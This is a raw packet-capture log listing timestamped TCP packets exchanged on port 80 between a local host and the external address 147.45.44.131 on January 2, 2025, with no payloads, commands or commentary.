Jan 2, 2025 19:13:04.960195065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960195065 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960206032 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960213900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960225105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960236073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960247040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960254908 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960282087 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960282087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960294962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960304976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960316896 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960324049 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960329056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960338116 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960350037 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960361004 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960361958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960372925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960382938 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960395098 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960405111 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960426092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960433006 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960437059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960448027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960458994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960465908 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960475922 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960488081 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960488081 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960498095 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960517883 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960531950 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960572958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960587978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960601091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960612059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960623980 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960624933 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960643053 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960648060 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960665941 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960679054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960681915 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960690022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960700035 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960711002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960720062 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960725069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960741997 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960755110 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960777044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960788012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960803986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960813046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960828066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960829973 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960843086 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960850954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960860968 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960870981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960882902 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960895061 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960896015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960906982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960916042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960926056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960943937 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960946083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960957050 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960964918 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960968971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960978985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.960998058 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.960998058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961009026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961020947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961026907 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.961031914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961040020 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.961044073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961067915 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.961220980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961230993 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961242914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961256981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961263895 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.961266994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961280107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961285114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.961291075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961303949 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961309910 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.961314917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.961332083 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.961353064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.962229013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962246895 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962296009 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.962399006 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962409973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962419987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962429047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962444067 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.962447882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962460995 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.962462902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962474108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962485075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962500095 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.962513924 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.962517023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962527990 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962538958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962549925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962559938 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.962563038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962595940 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.962621927 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962658882 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.962733984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962747097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962758064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962769032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962779999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962783098 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.962785959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.962821960 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.046621084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046646118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046658039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046667099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046677113 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046686888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046700001 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046706915 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.046716928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046726942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046737909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046750069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046751022 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.046767950 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.046772003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046787024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.046791077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046801090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046808004 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.046818972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046828032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046838045 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.046844959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046864986 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.046875000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046885014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046900988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046910048 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.046938896 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.046987057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.046996117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047007084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047018051 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047025919 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047028065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047039986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047051907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047053099 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047060966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047070980 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047072887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047082901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047102928 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047120094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047122955 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047130108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047143936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047154903 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047163010 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047173977 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047178984 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047184944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047194004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047209024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047221899 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047229052 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047234058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047244072 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047277927 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047286987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047297001 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047306061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047343016 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047343016 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047363997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047441006 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047475100 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047486067 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047517061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047552109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047588110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047599077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047609091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047620058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047633886 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047648907 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047667980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047677994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047687054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047696114 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.047718048 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047735929 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.047749996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048094988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048109055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048119068 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048130989 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048131943 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048142910 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048149109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048152924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048163891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048168898 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048175097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048183918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048193932 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048207045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048207998 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048218012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048229933 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048235893 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048240900 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048254013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048264980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048276901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048276901 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048290014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048297882 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048300982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048314095 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048320055 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048325062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048336983 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048346996 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048347950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048357964 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048367977 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048377037 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048389912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048391104 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048398972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048409939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048420906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048423052 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048430920 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048443079 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048443079 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048455000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048463106 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048465967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048475981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048484087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048486948 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048496962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048510075 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048516989 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048527002 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048537970 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048548937 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048559904 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048572063 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048572063 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048582077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048594952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048595905 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048604965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048615932 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048624992 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048626900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048635960 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048638105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048649073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048660040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048666954 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048670053 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048682928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.048683882 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.048702002 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049036980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049074888 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049109936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049118042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049128056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049138069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049149036 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049154997 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049160004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049171925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049175024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049196959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049247026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049257040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049267054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049283981 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049284935 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049294949 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049298048 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049307108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049316883 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049325943 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049338102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049341917 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049366951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049366951 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049377918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049386024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049395084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049407005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049410105 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049417019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049426079 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049436092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049447060 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.049455881 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.049488068 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133403063 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133416891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133431911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133443117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133452892 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133462906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133476019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133480072 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133490086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133500099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133508921 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133518934 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133567095 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133575916 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133585930 CET	80	49731	147.45.44.131	192.168.2.4
